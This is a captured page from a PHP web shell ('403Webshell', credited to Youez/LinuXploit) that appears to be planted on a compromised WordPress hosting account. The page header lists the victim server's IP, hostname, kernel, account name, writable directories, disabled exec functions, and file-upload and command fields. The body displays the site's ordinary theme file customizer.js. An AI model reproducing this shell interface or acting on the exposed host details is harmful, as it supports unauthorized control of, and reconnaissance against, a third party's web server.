403Webshell
Server IP : 10.19.1.101  /  Your IP : 216.73.216.158
Web Server : Apache
System : Linux web1f13.kinghost.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
User : schererimoveisrs ( 170628)
PHP Version : 7.4.33
Disable Function : apache_child_terminate,c99_buff_prepare,c99_sess_put,dl,exec,leak,link,myshellexec,openlog,passthru,pclose,pcntl_exec,php_check_syntax,php_strip_whitespace,popen,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,show_source,symlink,system,socket_listen,socket_create_listen,putenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/schererimoveisrs/www/wp-content/themes/context-blog/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/schererimoveisrs/www/wp-content/themes/context-blog/js/customizer.js
/* global wp, jQuery */
/**
 * File customizer.js.
 *
 * Theme Customizer enhancements for a better user experience.
 *
 * Contains handlers to make Theme Customizer preview reload changes asynchronously.
 */

( function( $ ) {
	// Site title and description.
	wp.customize( 'blogname', function( value ) {
		value.bind( function( to ) {
			$( '.site-title a' ).text( to );
		} );
	} );
	wp.customize( 'blogdescription', function( value ) {
		value.bind( function( to ) {
			$( '.site-description' ).text( to );
		} );
	} );

	// Header text color.
	wp.customize( 'header_textcolor', function( value ) {
		value.bind( function( to ) {
			if ( 'blank' === to ) {
				$( '.site-title, .site-description' ).css( {
					clip: 'rect(1px, 1px, 1px, 1px)',
					position: 'absolute',
				} );
			} else {
				$( '.site-title, .site-description' ).css( {
					clip: 'auto',
					position: 'relative',
				} );
				$('.banner-author-holder .banner-author-info h1 a').css({
					color: to,
				});
				$('.banner-author-holder .banner-author-info p').css({
					color: to,
				});
			}
		} );
	} );

	//Update site background color...
	wp.customize( 'background_color', function( value ) {
		value.bind( function( newval ) {
			var newval2 = '70vw solid ' + newval;
			$('[class*=about-author-] .about-author-holder').css('background-color', newval );
			$('.introduction-holder-right').css('border-left',  newval2);
			$('.introduction-holder-left').css('border-left',  newval2 );
			$('.full-blog-holder .item .caption').css('background-color',  newval );
			$('.sidebar-title h2').css('background-color',  newval );
			$('.sidebar-title h3').css('background-color',  newval );
			$('.sidebar-title h4').css('background-color',  newval );
			$('.sidebar-title h5').css('background-color',  newval );
			$('.sidebar-title h6').css('background-color',  newval );
			
			$('.home-section .blog-snippet').css('background-color',  newval );

			$('.home-section.inline-blog .blog-slider-thmb').css('background-color',  newval );

			$('.home-section.main-blog-holder aside > div').css('background-color',  newval );

			$('.static-page .detail-page-body').css('background-color',  newval );

			$('.static-page aside > div').css('background-color',  newval );

			$('.inside-page .detail-page-body').css('background-color',  newval );

			$('.inside-page .detail-page aside > div').css('background-color',  newval );

			$('.inside-page.archive .blog-snippet .blog-content').css('background-color',  newval );

			$('.inside-page.archive aside > div').css('background-color',  newval );

			$('.inside-page.search .blog-snippet .blog-content').css('background-color',  newval );

			$('.inside-page.search aside > div').css('background-color',  newval );

			$('.pagination .page-numbers').css('background-color',  newval );

			$('#masthead').css('background-color',  newval );

		} );
	} );
	
}( jQuery ) );

Youez - 2016 - github.com/yon3zu
LinuXploit